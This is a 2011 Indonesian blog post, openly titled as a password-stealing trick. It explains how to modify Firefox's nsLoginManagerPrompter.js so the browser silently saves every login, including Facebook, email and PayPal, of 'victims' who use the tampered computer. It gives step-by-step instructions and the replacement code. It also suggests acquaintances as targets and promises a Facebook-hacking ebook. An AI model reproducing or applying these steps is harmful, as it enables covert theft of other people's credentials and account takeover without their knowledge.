Pages

Minggu, 03 Juli 2011

Cara membuat firefox menyimpan password secara otomatis (Trik mencuri password)

Berikut ini saya akan menjelaskan cara agar mozilla firefox anda menyimpan password facebook, email, paypal, dll dari korban secara otomatis.

Sebelumnya saya pernah posting tentang cara mengetahui password yang tersimpan di browser firefox. Saya harap anda membcanya dulu agar lebih memahami tentang apa yang akan kita lakukan.

Baiklah, jika sudah membacanya mari kita lanjutkan. Setiap kita log in menggunakan browser firefox, biasanya akan muncul pesan berikut :


Benarkan? Nah, jika kita mengklik remember, maka password tersebut akan tersimpan dan dapat dengan mudah dilihat dengan membuka menu Tools - Option - Security - Saved Password - Show Saved Password bener kan?

Pastinya muncul pertanyaan di benak anda, seandainya saya bisa melakukan autosafe password tanpa perlu mengklik tombol remember itu, dan ternyata bisa. yah.. selamat kita bisa melakukannya dan setiap orang yang login pada firefox yang telah kita atur settingannya akan tersimpan passwordnya dan tentu saja kita bisa dengan mudah mengetahuinya.

Teknik ini sangat berguna jika target kita adalah orang yang kita kenal. Oke, pasti sudah tidak sabar dong. Ini dia caranya.

  1. Tutup firefox terlebih dahulu
  2. Browse C:\Program Files\Mozilla Firefox\components\ dan temukan script bernama nsLoginManagerPrompter.js
  3. Klik kanan > Edit with Notepad ++ (kalau belum punya, download dulu notepad++nya)
  4. Ganti baris ke 642 sampai 711 dengan kode berikut :
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);


Sehingga tampak seperti gambar berikut.
Selesai.
Maka setiap kali anda / teman anda login di komputer yang telah anda hack firefoxnya, maka passwordnya akan tersimpan seketika. Ingat, jangan disalahgunakan yah....

Nb : letak kode sintax untuk tiap versi firefox berbeda. oleh karena itu cukup perhatikan gambar diatas, apa yang yang harus ada, dan apa yang tidak ada.
Tips : letakkan diatas _removeLoginNotifications. Ada pertanyaan? Aya siap membantu... oya, aya akan segera membuat ebook baru tentang cara hack facebook. Doain semoga cepat selesai yah... :)

0 komentar:

:a: :b: :c: :d: :e: :f: :g: :h: :i: :j: :k: :l: :m: :n:

Posting Komentar